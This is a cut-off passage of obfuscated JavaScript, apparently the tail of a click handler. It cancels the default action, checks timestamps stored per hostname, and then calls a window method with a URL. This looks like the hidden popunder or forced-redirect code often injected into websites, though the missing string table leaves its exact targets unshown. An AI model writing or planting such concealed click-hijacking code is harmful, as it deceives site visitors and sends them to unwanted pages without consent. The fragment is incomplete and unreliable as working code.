_0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());